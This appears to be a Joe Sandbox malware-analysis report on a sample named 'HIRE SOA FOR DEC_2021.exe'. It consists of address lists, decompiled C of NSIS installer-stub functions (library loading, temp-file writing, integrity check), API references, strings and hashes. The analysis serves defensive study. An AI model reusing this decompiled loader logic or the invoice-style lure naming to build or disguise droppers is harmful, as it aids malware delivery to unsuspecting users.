0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x7a
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(znrugtwz,?,?,?,znrugtwz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,znrugtwz,?,?,?,znrugtwz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(znrugtwz), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403617
RichEd32, xrefs: 00403807
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 004035EF
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
RichEd20, xrefs: 004037FC
.DEFAULT\Control Panel\International, xrefs: 0040363F
1033, xrefs: 00403603, 0040364F
RichEdit, xrefs: 00403823
znrugtwz, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
_Nb, xrefs: 0040377C, 00403781
@6B, xrefs: 00403735
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
RichEdit20A, xrefs: 00403814, 0040381A
.exe, xrefs: 004036CC

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$znrugtwz
API String ID: 914957316-2706578468
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\HIRE SOA FOR DEC_2021.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x417fb
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x3f69
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
